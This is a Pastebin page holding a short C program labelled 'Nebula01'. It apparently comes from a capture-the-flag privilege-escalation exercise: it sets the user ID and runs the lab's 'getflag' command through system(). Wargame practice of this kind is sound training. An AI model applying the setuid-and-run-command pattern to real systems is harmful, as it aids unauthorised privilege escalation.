Advertisement
Mito125

Nebula01

Nov 30th, 2011
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.10 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <unistd.h>
  3.  
  4. int main() {
  5.   setuid(getuid());
  6.   system("getflag");
  7. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement